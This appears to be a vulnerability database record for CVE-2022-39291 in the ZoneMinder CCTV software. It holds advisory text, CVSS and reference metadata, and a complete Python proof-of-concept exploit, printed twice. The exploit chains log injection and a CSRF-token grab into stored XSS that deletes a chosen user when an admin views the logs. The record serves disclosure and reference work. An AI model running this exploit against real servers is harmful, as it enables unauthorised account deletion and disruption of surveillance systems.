VAR-202210-0071
Vulnerability from variot - Updated: 2025-01-30 20:08
ZoneMinder is a free, open source Closed-circuit television software application. Affected versions of zoneminder are subject to a vulnerability which allows users with "View" system permissions to inject new data into the logs stored by Zoneminder. This was observed through an HTTP POST request containing log information to the "/zm/index.php" endpoint. Submission is not rate controlled and could affect database performance and/or consume all storage resources. Users are advised to upgrade. There are no known workarounds for this issue. ZoneMinder contains an input validation vulnerability. Information may be tampered with and service operation may be interrupted (DoS).
Exploit Title: Zoneminder v1.36.26 - Log Injection -> CSRF Bypass -> Stored Cross-Site Scripting (XSS)
Date: 10/01/2022
Exploit Author: Trenches of IT
Vendor Homepage: https://github.com/ZoneMinder/zoneminder
Version: v1.36.26
Tested on: Linux/Windows
CVE: CVE-2022-39285, CVE-2022-39290, CVE-2022-39291
Writeup: https://www.trenchesofit.com/2022/09/30/zoneminder-web-app-testing/
Proof of Concept:
1 - The PoC injects a XSS payload with the CSRF bypass into logs. (This action will repeat every second until manually stopped)
2 - Admin user logs navigates to http://<target>/zm/index.php?view=log
3 - XSS executes delete function on target UID (user).
import requests
import re
import time
import argparse
import sys
def getOptions(args=sys.argv[1:]):
    parser = argparse.ArgumentParser(description="Trenches of IT Zoneminder Exploit PoC", epilog="Example: poc.py -i 1.2.3.4 -p 80 -u lowpriv -p lowpriv -d 1")
    parser.add_argument("-i", "--ip", help="Provide the IP or hostname of the target zoneminder server. (Example: -i 1.2.3.4", required=True)
    parser.add_argument("-p", "--port", help="Provide the port of the target zoneminder server. (Example: -p 80", required=True)
    parser.add_argument("-zU", "--username", help="Provide the low privileged username for the target zoneminder server. (Example: -zU lowpriv", required=True)
    parser.add_argument("-zP", "--password", help="Provide the low privileged password for the target zoneminder server. (Example: -zP lowpriv", required=True)
    parser.add_argument("-d", "--deleteUser", help="Provide the target user UID to delete from the target zoneminder server. (Example: -d 7", required=True)
    options = parser.parse_args(args)
    return options
options = getOptions(sys.argv[1:])
payload = "http%3A%2F%2F" + options.ip + "%2Fzm%2F<script src='/zm/index.php?view=options&tab=users&action=delete&markUids[]=" + options.deleteUser + "&deleteBtn=Delete'"
#Request to login and get the response headers
loginUrl = "http://" + options.ip + ":" + options.port + "/zm/index.php?action=login&view=login&username="+options.username+"&password="+options.password
loginCookies = {"zmSkin": "classic", "zmCSS": "base", "zmLogsTable.bs.table.pageNumber": "1", "zmEventsTable.bs.table.columns": "%5B%22Id%22%2C%22Name%22%2C%22Monitor%22%2C%22Cause%22%2C%22StartDateTime%22%2C%22EndDateTime%22%2C%22Length%22%2C%22Frames%22%2C%22AlarmFrames%22%2C%22TotScore%22%2C%22AvgScore%22%2C%22MaxScore%22%2C%22Storage%22%2C%22DiskSpace%22%2C%22Thumbnail%22%5D", "zmEventsTable.bs.table.searchText": "", "zmEventsTable.bs.table.pageNumber": "1", "zmBandwidth": "high", "zmHeaderFlip": "up", "ZMSESSID": "f1neru6bq6bfddl7snpjqo6ss2"}
loginHeaders = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/x-www-form-urlencoded", "Origin": "http://"+options.ip, "Connection": "close", "Referer": "http://"+options.ip+"/zm/index.php?view=login", "Upgrade-Insecure-Requests": "1"}
response = requests.post(loginUrl, headers=loginHeaders, cookies=loginCookies)
zmHeaders = response.headers
try:
    zoneminderSession = re.findall(r'ZMSESSID\=\w+\;', str(zmHeaders))
    finalSession = zoneminderSession[-1].replace('ZMSESSID=', '').strip(';')
except:
    print("[ERROR] Ensure the provided username and password is correct.")
    sys.exit(1)
print("Collected the low privilege user session token: "+finalSession)
#Request using response headers to obtain CSRF value
csrfUrl = "http://"+options.ip+":"+options.port+"/zm/index.php?view=filter"
csrfCookies = {"zmSkin": "classic", "zmCSS": "base", "zmLogsTable.bs.table.pageNumber": "1", "zmEventsTable.bs.table.columns": "%5B%22Id%22%2C%22Name%22%2C%22Monitor%22%2C%22Cause%22%2C%22StartDateTime%22%2C%22EndDateTime%22%2C%22Length%22%2C%22Frames%22%2C%22AlarmFrames%22%2C%22TotScore%22%2C%22AvgScore%22%2C%22MaxScore%22%2C%22Storage%22%2C%22DiskSpace%22%2C%22Thumbnail%22%5D", "zmEventsTable.bs.table.searchText": "", "zmEventsTable.bs.table.pageNumber": "1", "zmBandwidth": "high", "zmHeaderFlip": "up", "ZMSESSID": '"' + finalSession + '"'}
csrfHeaders = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Connection": "close", "Referer": "http://"+options.ip+"/zm/index.php?view=montagereview&fit=1&minTime=2022-09-30T20:52:58&maxTime=2022-09-30T21:22:58&current=2022-09-30%2021:07:58&displayinterval=1000&live=0&scale=1&speed=1", "Upgrade-Insecure-Requests": "1"}
response = requests.get(csrfUrl, headers=csrfHeaders, cookies=csrfCookies)
zmBody = response.text
extractedCsrfKey = re.findall(r'csrfMagicToken\s\=\s\"key\:\w+\,\d+', str(zmBody))
finalCsrfKey = extractedCsrfKey[0].replace('csrfMagicToken = "', '')
print("Collected the CSRF key for the log injection request: "+finalCsrfKey)
print("Navigate here with an admin user: http://"+options.ip+"/zm/index.php?view=log")
while True:
    #XSS Request
    xssUrl = "http://"+options.ip+"/zm/index.php"
    xssCookies = {"zmSkin": "classic", "zmCSS": "base", "zmLogsTable.bs.table.pageNumber": "1", "zmEventsTable.bs.table.columns": "%5B%22Id%22%2C%22Name%22%2C%22Monitor%22%2C%22Cause%22%2C%22StartDateTime%22%2C%22EndDateTime%22%2C%22Length%22%2C%22Frames%22%2C%22AlarmFrames%22%2C%22TotScore%22%2C%22AvgScore%22%2C%22MaxScore%22%2C%22Storage%22%2C%22DiskSpace%22%2C%22Thumbnail%22%5D", "zmEventsTable.bs.table.searchText": "", "zmEventsTable.bs.table.pageNumber": "1", "zmBandwidth": "high", "zmHeaderFlip": "up", "ZMSESSID": finalSession}
    xssHeaders = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0", "Accept": "application/json, text/javascript, */*; q=0.01", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8", "X-Requested-With": "XMLHttpRequest", "Origin": "http://"+options.ip, "Connection": "close", "Referer": "http://"+options.ip+"/zm/index.php?view=filter"}
    xssData = {"__csrf_magic": finalCsrfKey , "view": "request", "request": "log", "task": "create", "level": "ERR", "message": "Trenches%20of%20IT%20PoC", "browser[name]": "Firefox", "browser[version]": "91.0", "browser[platform]": "UNIX", "file": payload, "line": "105"}
    response = requests.post(xssUrl, headers=xssHeaders, cookies=xssCookies, data=xssData)
    print("Injecting payload: " + response.text)
    time.sleep(1)
{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-202210-0071",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "zoneminder",
"scope": "lt",
"trust": 1.0,
"vendor": "zoneminder",
"version": "1.36.27"
},
{
"model": "zoneminder",
"scope": "lt",
"trust": 1.0,
"vendor": "zoneminder",
"version": "1.37.24"
},
{
"model": "zoneminder",
"scope": "gt",
"trust": 1.0,
"vendor": "zoneminder",
"version": "1.37.0"
},
{
"model": "zoneminder",
"scope": "eq",
"trust": 0.8,
"vendor": "zoneminder",
"version": null
},
{
"model": "zoneminder",
"scope": "eq",
"trust": 0.8,
"vendor": "zoneminder",
"version": "1.37.0 greater than 1.37.24"
},
{
"model": "zoneminder",
"scope": null,
"trust": 0.8,
"vendor": "zoneminder",
"version": null
},
{
"model": "zoneminder",
"scope": "eq",
"trust": 0.8,
"vendor": "zoneminder",
"version": "1.36.27"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2022-018647"
},
{
"db": "NVD",
"id": "CVE-2022-39291"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Trenches Of IT",
"sources": [
{
"db": "PACKETSTORM",
"id": "171498"
}
],
"trust": 0.1
},
"cve": "CVE-2022-39291",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "nvd@nist.gov",
"availabilityImpact": "LOW",
"baseScore": 5.4,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"exploitabilityScore": 2.8,
"id": "CVE-2022-39291",
"impactScore": 2.5,
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"trust": 2.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "Low",
"baseScore": 5.4,
"baseSeverity": "Medium",
"confidentialityImpact": "None",
"exploitabilityScore": null,
"id": "CVE-2022-39291",
"impactScore": null,
"integrityImpact": "Low",
"privilegesRequired": "Low",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2022-39291",
"trust": 1.0,
"value": "MEDIUM"
},
{
"author": "security-advisories@github.com",
"id": "CVE-2022-39291",
"trust": 1.0,
"value": "MEDIUM"
},
{
"author": "NVD",
"id": "CVE-2022-39291",
"trust": 0.8,
"value": "Medium"
},
{
"author": "CNNVD",
"id": "CNNVD-202210-329",
"trust": 0.6,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2022-018647"
},
{
"db": "CNNVD",
"id": "CNNVD-202210-329"
},
{
"db": "NVD",
"id": "CVE-2022-39291"
},
{
"db": "NVD",
"id": "CVE-2022-39291"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "ZoneMinder is a free, open source Closed-circuit television software application. Affected versions of zoneminder are subject to a vulnerability which allows users with \"View\" system permissions to inject new data into the logs stored by Zoneminder. This was observed through an HTTP POST request containing log information to the \"/zm/index.php\" endpoint. Submission is not rate controlled and could affect database performance and/or consume all storage resources. Users are advised to upgrade. There are no known workarounds for this issue. ZoneMinder There is an input validation vulnerability in.Information is tampered with and service operation is interrupted (DoS) It may be in a state. # Exploit Title: Zoneminder v1.36.26 - Log Injection -\u003e CSRF Bypass -\u003e Stored Cross-Site Scripting (XSS)\n# Date: 10/01/2022\n# Exploit Author: Trenches of IT\n# Vendor Homepage: https://github.com/ZoneMinder/zoneminder\n# Version: v1.36.26\n# Tested on: Linux/Windows\n# CVE: CVE-2022-39285, CVE-2022-39290, CVE-2022-39291 \n# Writeup: https://www.trenchesofit.com/2022/09/30/zoneminder-web-app-testing/\n#\n# Proof of Concept:\n# 1 - The PoC injects a XSS payload with the CSRF bypass into logs. (This action will repeat every second until manually stopped)\n# 2 - Admin user logs navigates to http://\u003ctarget\u003e/zm/index.php?view=log\n# 3 - XSS executes delete function on target UID (user). \n\nimport requests\nimport re\nimport time\nimport argparse\nimport sys\n\ndef getOptions(args=sys.argv[1:]):\n parser = argparse.ArgumentParser(description=\"Trenches of IT Zoneminder Exploit PoC\", epilog=\"Example: poc.py -i 1.2.3.4 -p 80 -u lowpriv -p lowpriv -d 1\")\n parser.add_argument(\"-i\", \"--ip\", help=\"Provide the IP or hostname of the target zoneminder server. (Example: -i 1.2.3.4\", required=True)\n parser.add_argument(\"-p\", \"--port\", help=\"Provide the port of the target zoneminder server. 
(Example: -p 80\", required=True)\n parser.add_argument(\"-zU\", \"--username\", help=\"Provide the low privileged username for the target zoneminder server. (Example: -zU lowpriv\", required=True)\n parser.add_argument(\"-zP\", \"--password\", help=\"Provide the low privileged password for the target zoneminder server. (Example: -zP lowpriv\", required=True)\n parser.add_argument(\"-d\", \"--deleteUser\", help=\"Provide the target user UID to delete from the target zoneminder server. (Example: -d 7\", required=True)\n options = parser.parse_args(args)\n return options\n\noptions = getOptions(sys.argv[1:])\n\npayload = \"http%3A%2F%2F\" + options.ip + \"%2Fzm%2F\u003c/td\u003e\u003c/tr\u003e\u003cscript src=\u0027/zm/index.php?view=options\u0026tab=users\u0026action=delete\u0026markUids[]=\" + options.deleteUser + \"\u0026deleteBtn=Delete\u0027\u003c/script\u003e\"\n\n#Request to login and get the response headers\nloginUrl = \"http://\" + options.ip + \":\" + options.port + \"/zm/index.php?action=login\u0026view=login\u0026username=\"+options.username+\"\u0026password=\"+options.password\nloginCookies = {\"zmSkin\": \"classic\", \"zmCSS\": \"base\", \"zmLogsTable.bs.table.pageNumber\": \"1\", \"zmEventsTable.bs.table.columns\": \"%5B%22Id%22%2C%22Name%22%2C%22Monitor%22%2C%22Cause%22%2C%22StartDateTime%22%2C%22EndDateTime%22%2C%22Length%22%2C%22Frames%22%2C%22AlarmFrames%22%2C%22TotScore%22%2C%22AvgScore%22%2C%22MaxScore%22%2C%22Storage%22%2C%22DiskSpace%22%2C%22Thumbnail%22%5D\", \"zmEventsTable.bs.table.searchText\": \"\", \"zmEventsTable.bs.table.pageNumber\": \"1\", \"zmBandwidth\": \"high\", \"zmHeaderFlip\": \"up\", \"ZMSESSID\": \"f1neru6bq6bfddl7snpjqo6ss2\"}\nloginHeaders = {\"User-Agent\": \"Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0\", \"Accept\": \"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\", \"Accept-Language\": \"en-US,en;q=0.5\", \"Accept-Encoding\": \"gzip, deflate\", \"Content-Type\": 
\"application/x-www-form-urlencoded\", \"Origin\": \"http://\"+options.ip, \"Connection\": \"close\", \"Referer\": \"http://\"+options.ip+\"/zm/index.php?view=login\", \"Upgrade-Insecure-Requests\": \"1\"}\nresponse = requests.post(loginUrl, headers=loginHeaders, cookies=loginCookies)\nzmHeaders = response.headers\ntry:\n zoneminderSession = re.findall(r\u0027ZMSESSID\\=\\w+\\;\u0027, str(zmHeaders))\n finalSession = zoneminderSession[-1].replace(\u0027ZMSESSID=\u0027, \u0027\u0027).strip(\u0027;\u0027)\nexcept:\n print(\"[ERROR] Ensure the provided username and password is correct.\")\n sys.exit(1)\nprint(\"Collected the low privilege user session token: \"+finalSession)\n\n#Request using response headers to obtain CSRF value\ncsrfUrl = \"http://\"+options.ip+\":\"+options.port+\"/zm/index.php?view=filter\"\ncsrfCookies = {\"zmSkin\": \"classic\", \"zmCSS\": \"base\", \"zmLogsTable.bs.table.pageNumber\": \"1\", \"zmEventsTable.bs.table.columns\": \"%5B%22Id%22%2C%22Name%22%2C%22Monitor%22%2C%22Cause%22%2C%22StartDateTime%22%2C%22EndDateTime%22%2C%22Length%22%2C%22Frames%22%2C%22AlarmFrames%22%2C%22TotScore%22%2C%22AvgScore%22%2C%22MaxScore%22%2C%22Storage%22%2C%22DiskSpace%22%2C%22Thumbnail%22%5D\", \"zmEventsTable.bs.table.searchText\": \"\", \"zmEventsTable.bs.table.pageNumber\": \"1\", \"zmBandwidth\": \"high\", \"zmHeaderFlip\": \"up\", \"ZMSESSID\": \u0027\"\u0027 + finalSession + \u0027\"\u0027}\ncsrfHeaders = {\"User-Agent\": \"Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0\", \"Accept\": \"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\", \"Accept-Language\": \"en-US,en;q=0.5\", \"Accept-Encoding\": \"gzip, deflate\", \"Connection\": \"close\", \"Referer\": \"http://\"+options.ip+\"/zm/index.php?view=montagereview\u0026fit=1\u0026minTime=2022-09-30T20:52:58\u0026maxTime=2022-09-30T21:22:58\u0026current=2022-09-30%2021:07:58\u0026displayinterval=1000\u0026live=0\u0026scale=1\u0026speed=1\", 
\"Upgrade-Insecure-Requests\": \"1\"}\nresponse = requests.get(csrfUrl, headers=csrfHeaders, cookies=csrfCookies)\nzmBody = response.text\nextractedCsrfKey = re.findall(r\u0027csrfMagicToken\\s\\=\\s\\\"key\\:\\w+\\,\\d+\u0027, str(zmBody))\nfinalCsrfKey = extractedCsrfKey[0].replace(\u0027csrfMagicToken = \"\u0027, \u0027\u0027)\nprint(\"Collected the CSRF key for the log injection request: \"+finalCsrfKey)\nprint(\"Navigate here with an admin user: http://\"+options.ip+\"/zm/index.php?view=log\")\n\nwhile True:\n \n #XSS Request\n xssUrl = \"http://\"+options.ip+\"/zm/index.php\"\n xssCookies = {\"zmSkin\": \"classic\", \"zmCSS\": \"base\", \"zmLogsTable.bs.table.pageNumber\": \"1\", \"zmEventsTable.bs.table.columns\": \"%5B%22Id%22%2C%22Name%22%2C%22Monitor%22%2C%22Cause%22%2C%22StartDateTime%22%2C%22EndDateTime%22%2C%22Length%22%2C%22Frames%22%2C%22AlarmFrames%22%2C%22TotScore%22%2C%22AvgScore%22%2C%22MaxScore%22%2C%22Storage%22%2C%22DiskSpace%22%2C%22Thumbnail%22%5D\", \"zmEventsTable.bs.table.searchText\": \"\", \"zmEventsTable.bs.table.pageNumber\": \"1\", \"zmBandwidth\": \"high\", \"zmHeaderFlip\": \"up\", \"ZMSESSID\": finalSession}\n xssHeaders = {\"User-Agent\": \"Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0\", \"Accept\": \"application/json, text/javascript, */*; q=0.01\", \"Accept-Language\": \"en-US,en;q=0.5\", \"Accept-Encoding\": \"gzip, deflate\", \"Content-Type\": \"application/x-www-form-urlencoded; charset=UTF-8\", \"X-Requested-With\": \"XMLHttpRequest\", \"Origin\": \"http://\"+options.ip, \"Connection\": \"close\", \"Referer\": \"http://\"+options.ip+\"/zm/index.php?view=filter\"}\n xssData = {\"__csrf_magic\": finalCsrfKey , \"view\": \"request\", \"request\": \"log\", \"task\": \"create\", \"level\": \"ERR\", \"message\": \"Trenches%20of%20IT%20PoC\", \"browser[name]\": \"Firefox\", \"browser[version]\": \"91.0\", \"browser[platform]\": \"UNIX\", \"file\": payload, \"line\": \"105\"} \n response = 
requests.post(xssUrl, headers=xssHeaders, cookies=xssCookies, data=xssData)\n print(\"Injecting payload: \" + response.text)\n\n time.sleep(1)\n \n\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2022-39291"
},
{
"db": "JVNDB",
"id": "JVNDB-2022-018647"
},
{
"db": "PACKETSTORM",
"id": "171498"
}
],
"trust": 1.71
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2022-39291",
"trust": 3.4
},
{
"db": "PACKETSTORM",
"id": "171498",
"trust": 2.5
},
{
"db": "JVNDB",
"id": "JVNDB-2022-018647",
"trust": 0.8
},
{
"db": "EXPLOIT-DB",
"id": "51071",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-202210-329",
"trust": 0.6
},
{
"db": "OTHER",
"id": "NONE",
"trust": 0.1
}
],
"sources": [
{
"db": "OTHER",
"id": null
},
{
"db": "JVNDB",
"id": "JVNDB-2022-018647"
},
{
"db": "PACKETSTORM",
"id": "171498"
},
{
"db": "CNNVD",
"id": "CNNVD-202210-329"
},
{
"db": "NVD",
"id": "CVE-2022-39291"
}
]
},
"id": "VAR-202210-0071",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "OTHER",
"id": null
}
],
"trust": 0.01
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"home \u0026 office device"
],
"sub_category": "TV",
"trust": 0.1
}
],
"sources": [
{
"db": "OTHER",
"id": null
}
]
},
"last_update_date": "2025-01-30T20:08:46.417000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "ZoneMinder Enter the fix for the verification error vulnerability",
"trust": 0.6,
"url": "http://123.124.177.30/web/xxk/bdxqById.tag?id=209968"
}
],
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202210-329"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-20",
"trust": 1.0
},
{
"problemtype": "Inappropriate input confirmation (CWE-20) [ others ]",
"trust": 0.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2022-018647"
},
{
"db": "NVD",
"id": "CVE-2022-39291"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.4,
"url": "http://packetstormsecurity.com/files/171498/zoneminder-log-injection-xss-cross-site-request-forgery.html"
},
{
"trust": 2.4,
"url": "https://github.com/zoneminder/zoneminder/commit/34ffd92bf123070cab6c83ad4cfe6297dd0ed0b4"
},
{
"trust": 2.4,
"url": "https://github.com/zoneminder/zoneminder/commit/73d9f2482cdcb238506388798d3cf92546f9e40c"
},
{
"trust": 2.4,
"url": "https://github.com/zoneminder/zoneminder/commit/cb3fc5907da21a5111ae54128a5d0b49ae755e9b"
},
{
"trust": 2.4,
"url": "https://github.com/zoneminder/zoneminder/commit/de2866f9574a2bf2690276fad53c91d607825408"
},
{
"trust": 2.4,
"url": "https://github.com/zoneminder/zoneminder/security/advisories/ghsa-cfcx-v52x-jh74"
},
{
"trust": 1.5,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-39291"
},
{
"trust": 0.6,
"url": "https://www.exploit-db.com/exploits/51071"
},
{
"trust": 0.6,
"url": "https://cxsecurity.com/cveshow/cve-2022-39291/"
},
{
"trust": 0.1,
"url": "https://ieeexplore.ieee.org/abstract/document/10769424"
},
{
"trust": 0.1,
"url": "http://\"+options.ip+\"/zm/index.php?view=log\")"
},
{
"trust": 0.1,
"url": "http://\"+options.ip+\"/zm/index.php\""
},
{
"trust": 0.1,
"url": "http://\"+options.ip+\"/zm/index.php?view=montagereview\u0026fit=1\u0026mintime=2022-09-30t20:52:58\u0026maxtime=2022-09-30t21:22:58\u0026current=2022-09-30%2021:07:58\u0026displayinterval=1000\u0026live=0\u0026scale=1\u0026speed=1\","
},
{
"trust": 0.1,
"url": "https://www.trenchesofit.com/2022/09/30/zoneminder-web-app-testing/"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-39285"
},
{
"trust": 0.1,
"url": "http://\"+options.ip+\"/zm/index.php?view=login\","
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-39290"
},
{
"trust": 0.1,
"url": "https://github.com/zoneminder/zoneminder"
},
{
"trust": 0.1,
"url": "http://\""
},
{
"trust": 0.1,
"url": "http://\"+options.ip+\"/zm/index.php?view=filter\"}"
},
{
"trust": 0.1,
"url": "http://\"+options.ip+\":\"+options.port+\"/zm/index.php?view=filter\""
},
{
"trust": 0.1,
"url": "http://\"+options.ip,"
},
{
"trust": 0.1,
"url": "http://\u003ctarget\u003e/zm/index.php?view=log"
}
],
"sources": [
{
"db": "OTHER",
"id": null
},
{
"db": "JVNDB",
"id": "JVNDB-2022-018647"
},
{
"db": "PACKETSTORM",
"id": "171498"
},
{
"db": "CNNVD",
"id": "CNNVD-202210-329"
},
{
"db": "NVD",
"id": "CVE-2022-39291"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "OTHER",
"id": null
},
{
"db": "JVNDB",
"id": "JVNDB-2022-018647"
},
{
"db": "PACKETSTORM",
"id": "171498"
},
{
"db": "CNNVD",
"id": "CNNVD-202210-329"
},
{
"db": "NVD",
"id": "CVE-2022-39291"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2023-10-20T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2022-018647"
},
{
"date": "2023-03-27T14:54:04",
"db": "PACKETSTORM",
"id": "171498"
},
{
"date": "2022-10-07T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202210-329"
},
{
"date": "2022-10-07T21:15:11.770000",
"db": "NVD",
"id": "CVE-2022-39291"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2023-10-20T08:27:00",
"db": "JVNDB",
"id": "JVNDB-2022-018647"
},
{
"date": "2023-03-28T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202210-329"
},
{
"date": "2023-03-27T18:15:11.797000",
"db": "NVD",
"id": "CVE-2022-39291"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202210-329"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "ZoneMinder\u00a0 Input verification vulnerability in",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2022-018647"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "input validation error",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202210-329"
}
],
"trust": 0.6
}
}